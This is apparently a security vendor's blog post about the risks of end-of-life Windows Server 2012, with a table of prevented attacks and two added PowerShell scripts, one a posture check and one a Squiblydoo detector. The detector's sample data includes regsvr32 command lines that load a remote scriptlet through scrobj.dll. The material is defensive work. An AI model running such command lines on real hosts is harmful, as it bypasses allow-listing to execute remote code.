
Windows Server 2012 End of Life –– How do You Secure Legacy Servers?

Posted by Oren Dvoskin on October 10, 2023

In October 2023, Microsoft Windows Server 2012 and 2012 R2 reached their end of life. Microsoft has ended free updates, bug fixes, and technical support for an operating system that still runs on hundreds of thousands of enterprise servers.


Microsoft allows customers to purchase Extended Security Updates (ESUs) until 2026. However, its core recommendation for Windows Server 2012 users is to migrate to the cloud with Azure or to upgrade their on-prem servers to Windows Server 2022.

As we covered in a previous blog post about legacy risks, business-critical servers are often either too operationally critical to take offline or so entangled in dependencies that upgrading or migrating them is effectively impossible.

The Windows Server 2012 end of support is no surprise. Microsoft follows a well-established product lifecycle and announces OS sunset dates years in advance. If an organization has not upgraded its Windows Server 2012 servers by now, it is unlikely to do so in the near future either. So, what can it do instead?


The Legacy Server Landscape 

Legacy Windows servers are a growing source of risk.

Market share data puts the share of servers running an out-of-support Windows operating system (Windows Server 2008, 2008 R2, 2012, or 2012 R2) at around 10% of all servers in use today.

Hundreds of thousands of legacy Windows servers currently support critical functions, and every one of them carries exploitable vulnerabilities. If you work in a manufacturing business, healthcare organization, financial institution, or any company that runs OT, your organization likely depends on servers powered by one or more of these legacy systems.

The risks legacy systems create are well known (we have written about how to protect Windows 7, 8, 8.1, and Windows Server 2008 R2). Still, it is worth noting that Windows Server 2012 adds more than 2,500 known vulnerabilities, over 100 of which have been exploited, to the legacy risk register.

And the list of attack vectors keeps growing: between Q1 and Q3 2023 alone, 23 high-severity vulnerabilities were published for Windows Server 2012.

Experience from past operating system sunsets shows that exploit developers keep combing legacy codebases for exploitable bugs long after the vendor has stopped fixing them. Threat actors continue to scan target environments for legacy hosts and exploit the vulnerabilities they find there.

The data bears this out: in recent months, Morphisec prevented over 600 high-priority security incidents, spanning more than 40 distinct malware families, on our clients' legacy Windows endpoints alone.

 

Attacks prevented by Morphisec on legacy Windows systems (each one bypassed the installed EPP/EDR)

| Attack prevented | Description | Operating system(s) |
|---|---|---|
| Cobalt Strike backdoor | Cobalt Strike is a modular backdoor that frequently leads to domain propagation and follow-on exploitation such as ransomware deployment and IP theft. | Windows 7, Windows Server 2008, Windows Server 2012 |
| Metasploit Framework | Metasploit is a powerful exploitation framework used by cybercriminals and ethical hackers alike to probe for and exploit vulnerabilities on networks and servers. | Windows 7, Windows 8, Windows Server 2012 |
| Gamarue malware | Gamarue is a malware family that downloads additional files to enable information theft from infected systems. Worm variants of Gamarue infect USB drives and portable hard disks that are connected to an infected system. | Windows 7 |
| Log4Shell exploitation | Exploitation of Log4Shell in the Ubiquiti UniFi application. | Windows Server 2012 |
| Mimikatz password theft | Mimikatz is a toolset for collecting and using Windows credentials on target systems. | Windows 7, Windows Server 2012 |
| ProxyShellMiner | ProxyShellMiner is a cryptomining campaign whose operators use the ProxyShell Exchange exploits to deploy a crypto miner. | Windows 7, Windows Server 2008, Windows Server 2012 |
| Squiblydoo remote code execution | Application allow-list bypass in which regsvr32.exe loads scrobj.dll with a remote scriptlet, giving code execution under a signed Windows binary. | Windows 7, Windows Server 2008, Windows Server 2012 |

Source: Morphisec threat data
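The Squiblydoo row above is worth turning into detection logic, because the technique uses nothing but signed Windows binaries and passes a naive allow-list. The PowerShell below is an added example, not code from the original post or from Morphisec. It classifies process command lines, runs the check over four constructed samples, and includes a function that applies the same test to live Security 4688 events. The function names, the sample command lines, the 203.0.113.10 address and the example.org URL are all invented for this illustration.

```powershell
# Added example, not from the original post: flag Squiblydoo-style regsvr32 abuse in
# process-creation records. The technique is regsvr32.exe loading scrobj.dll with
# /i:<URL>, so a remote COM scriptlet runs under a signed, allow-listed Windows binary.
# The sample command lines below are constructed for this demo. The live-hunt function
# reads Security event 4688; on 2008 R2 / 2012 / 2012 R2 that event carries the command
# line only after KB3004375 is installed and "Include command line in process creation
# events" is enabled in audit policy.

function Test-SquiblydooCommandLine {
    param([string]$CommandLine)
    if ([string]::IsNullOrEmpty($CommandLine)) { return $false }
    $cl = $CommandLine.ToLowerInvariant()
    # regsvr32 must be the launched binary (bare name or full path, quoted or not) ...
    $isRegsvr32    = $cl -match '(^|[\\\s"])regsvr32(\.exe)?["\s]'
    # ... loading the scriptlet handler scrobj.dll ...
    $loadsScrobj   = $cl -match 'scrobj\.dll'
    # ... with /i: pointing at a remote scriptlet (http(s), ftp, or a UNC path).
    $remoteInstall = $cl -match '/i:\s*"?(https?://|ftp://|\\\\)'
    return ($isRegsvr32 -and $loadsScrobj -and $remoteInstall)
}

# Constructed samples: two legitimate regsvr32 uses and two Squiblydoo variants.
$samples = @(
    'regsvr32.exe /s "C:\Program Files\Vendor\ocx\control.ocx"',
    'C:\Windows\System32\regsvr32.exe /u /s C:\Temp\legacy.dll',
    'regsvr32 /s /n /u /i:http://203.0.113.10/payload.sct scrobj.dll',
    '"C:\Windows\SysWOW64\regsvr32.exe" /S /U /N /I:"https://example.org/f.sct" SCROBJ.DLL'
)
$samples | ForEach-Object {
    New-Object PSObject -Property @{
        Suspicious  = (Test-SquiblydooCommandLine -CommandLine $_)
        CommandLine = $_
    }
} | Format-Table -AutoSize

# Live hunt over the Security log (event 4688, "A new process has been created").
function Find-SquiblydooEvents {
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
    ForEach-Object {
        # Event XML keeps field names stable across OS versions; CommandLine is the
        # "Process Command Line" field that KB3004375 added on legacy builds.
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if (Test-SquiblydooCommandLine -CommandLine $data['CommandLine']) {
            New-Object PSObject -Property @{
                TimeCreated = $_.TimeCreated
                User        = $data['SubjectUserName']
                Process     = $data['NewProcessName']
                CommandLine = $data['CommandLine']
            }
        }
    }
}
```

Of the four constructed samples, only the two that pass a remote /i: target to scrobj.dll are flagged; ordinary registration or unregistration of a local DLL is left alone. On a legacy server, `Find-SquiblydooEvents` returns nothing at all unless command-line auditing has been enabled, which is itself a useful finding: if 4688 events carry no command line, that host is giving its EDR far less than a Server 2016 host would.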

 

Legacy Servers Create Ransomware Risks 

Legacy Windows operating systems often feature in ransomware attack chains. Modern ransomware groups target them to establish persistence and propagate through the network.

One of the most common attacks Morphisec stops on legacy Windows servers involves Cobalt Strike. This modular backdoor was developed as a penetration-testing tool but is now widely abused by threat actors running cracked versions. Cobalt Strike often leads to domain propagation and further exploitation as part of an attack chain that ends in ransomware deployment and IP theft.

Critically, Cobalt Strike operates in an endpoint's runtime memory. That makes it especially dangerous for servers running legacy Windows versions such as Server 2012, which are at increased risk from fileless malware and other threats that live only in memory.

Cobalt Strike is a common feature in headline-making ransomware attacks like the Conti attack that disabled Ireland's health service in 2021.  

 

Windows Legacy Server EDR Challenges 

With such a high-risk profile, end-of-life Windows servers demand protection from ransomware and other threats.

Because legacy servers often host business-critical processes, and because of their increased exposure, they must be protected by state-of-the-art endpoint protection. Unfortunately, the Endpoint Detection and Response (EDR) technology you use to protect the rest of your network is not well suited to this task.

There are several reasons for the mismatch between EDR and legacy Windows servers.

Most fundamentally, legacy systems are not an environment EDRs are optimized for. You can install EDR agents on legacy servers, but to be effective, EDRs rely on operating system instrumentation that did not exist when these OS versions shipped. This severely limits the effectiveness of NGAV/EDR solutions.

Older legacy systems (anything running Windows 7 or Windows Server 2008 R2) expose only a limited version of Event Tracing for Windows (ETW), with far fewer providers than a current OS. An installed EDR therefore cannot get as much real-time telemetry as it would on a modern system. The result is less visibility and a lower detection rate for advanced threats.

Any server running an OS older than Windows Server 2016 also lacks Microsoft's Antimalware Scan Interface (AMSI). Modern EDRs rely on AMSI to spot obfuscated and packed scripts, evasive macros, and most "living off the land" techniques.

 

Comparison of security features: Windows Server 2008 R2, 2012 R2, and 2016 and above

| Security capability | Windows Server 2008 R2 | Windows Server 2012 R2 | Windows Server 2016 and above |
|---|---|---|---|
| Shielded Virtual Machines | Not supported | Not supported | Fully supported |
| Host Guardian Service | Not supported | Not supported | Fully supported |
| Antimalware Scan Interface (AMSI) | Not supported | Not supported | Fully supported |
| Event Tracing for Windows (ETW) | Limited support | Limited support | Fully supported |
| Just Enough Administration (JEA) | Fully supported | Fully supported | Fully supported |
| Just-in-Time Administration (JIT) | Limited support | Fully supported | Fully supported |
| Credential Guard | Not supported | Not supported | Fully supported |
| Remote Credential Guard | Not supported | Not supported | Fully supported |
| Device Guard | Not supported | Not supported | Fully supported |
| AppLocker | Limited support | Fully supported | Fully supported |
| Windows Defender | Limited support | Limited support | Fully supported |
| Control Flow Guard | Not supported | Not supported | Fully supported |
| Generation 2 virtual machines | Not supported | Limited support | Fully supported |
| Enhanced auditing for threat detection | Not supported | Limited support | Fully supported |
| Dynamic Access Control | Not supported | Fully supported | Fully supported |
| Windows Firewall with Advanced Security | Not supported | Fully supported | Fully supported |
| BitLocker | Limited support | Fully supported | Fully supported |
| Small-footprint Hyper-V host (Server Core) | Limited support | Limited support | Fully supported |

Source: Microsoft, Windows Server 2016 Feature Comparison Guide: https://download.microsoft.com/download/0/D/4/0D4F30FD-59EF-454E-870C-B644B73438B4/WIndows_Server_2016_Feature_Comparison_Guide.pdf
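The gaps in the table, and the ETW and AMSI limitations described above it, are easy to verify on a given host. The PowerShell script below is an added example, not code from the original post or from Microsoft's comparison guide. It reports the build and support status of the server it runs on and checks for the specific primitives this section discusses: amsi.dll, the Microsoft-Windows-Threat-Intelligence ETW provider, Credential Guard, and AppLocker enforcement. The build numbers, WMI classes and registry paths are standard Windows values; the function name is invented for this example, and the script deliberately avoids PowerShell 3+ syntax so it runs on 2008 R2 and 2012 hosts as well.

```powershell
# Added example, not from the original post: triage one Windows server for end-of-life
# status and for the OS security primitives that EDRs depend on (AMSI, the
# Threat-Intelligence ETW provider, Credential Guard, AppLocker enforcement).
# Uses only built-in cmdlets and avoids PowerShell 3+ syntax so it also runs on
# 2008 R2 / 2012 hosts. Run from an elevated prompt for complete results.

function Get-LegacyServerPosture {
    $os    = Get-WmiObject -Class Win32_OperatingSystem
    $build = [int]$os.BuildNumber

    # Build-to-release map for the server SKUs discussed in the post.
    # 2008 R2 left support on 2020-01-14; 2012 and 2012 R2 on 2023-10-10.
    $release = switch ($build) {
        7600    { 'Windows Server 2008 R2' }
        7601    { 'Windows Server 2008 R2 SP1' }
        9200    { 'Windows Server 2012' }
        9600    { 'Windows Server 2012 R2' }
        14393   { 'Windows Server 2016' }
        17763   { 'Windows Server 2019' }
        20348   { 'Windows Server 2022' }
        default { "Unknown build $build" }
    }

    # AMSI shipped with Windows 10 / Server 2016. The presence of amsi.dll is the
    # simplest on-box indicator: without it nothing can call AmsiScanBuffer.
    $amsiPresent = Test-Path (Join-Path $env:SystemRoot 'System32\amsi.dll')

    # The Microsoft-Windows-Threat-Intelligence ETW provider (memory allocation and
    # injection telemetry used by EDRs) is likewise absent before Server 2016.
    $providers = & logman.exe query providers 2>$null
    $tiEtw = [bool]($providers | Where-Object { $_ -match 'Microsoft-Windows-Threat-Intelligence' })

    # Credential Guard reports through the DeviceGuard WMI namespace, which only
    # exists on 2016+; on older builds the query throws, which we treat as "not running".
    $credGuard = $false
    try {
        $dg = Get-WmiObject -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                            -Class Win32_DeviceGuard -ErrorAction Stop
        $credGuard = ($dg.SecurityServicesRunning -contains 1)   # 1 = Credential Guard
    } catch { }

    # AppLocker enforces only when the Application Identity service runs AND at least
    # one rule collection under SrpV2 has EnforcementMode = 1 (0 = audit only).
    $appIdSvc        = Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue
    $srpV2           = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2'
    $enforcedRuleSet = $false
    if (Test-Path $srpV2) {
        $enforcedRuleSet = [bool](Get-ChildItem $srpV2 | Where-Object {
            (Get-ItemProperty -Path $_.PSPath).EnforcementMode -eq 1 })
    }

    New-Object PSObject -Property @{
        ComputerName      = $env:COMPUTERNAME
        Release           = $release
        Build             = $build
        OutOfSupport      = ($build -lt 14393)   # everything below Server 2016 is EOL as of Oct 2023
        AmsiAvailable     = $amsiPresent
        ThreatIntelEtw    = $tiEtw
        CredentialGuard   = $credGuard
        AppLockerEnforced = (($appIdSvc -ne $null) -and ($appIdSvc.Status -eq 'Running') -and $enforcedRuleSet)
    }
}

Get-LegacyServerPosture | Format-List
```

Run it on a 2012 R2 host and the AMSI and Threat-Intelligence ETW checks come back false no matter which EDR agent is installed, which is the concrete reason the section gives for EDR underperforming there. The same script run across an estate (for example via `Invoke-Command` against a server list) gives a quick inventory of which hosts are out of support and which compensating controls, such as AppLocker, are actually enforced on them.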

 


Protect Legacy Servers with Morphisec 

Morphisec's Automated Moving Target Defense (AMTD) technology uses an ultra-lightweight agent to block unauthorized processes on legacy Windows servers deterministically rather than probabilistically.  

AMTD, which Gartner has championed as "the future of cyber," sidesteps the architectural limitations that legacy OS environments impose on other security technologies and provides proactive protection against threats.

Protecting over 7,000 organizations and deployed at over nine million endpoints, including tens of thousands of legacy environments, Morphisec's AMTD technology prevents unauthorized code from executing, regardless of whether a recognizable signature or behavior pattern exists.  

Request a demo today to see Morphisec AMTD in action. 
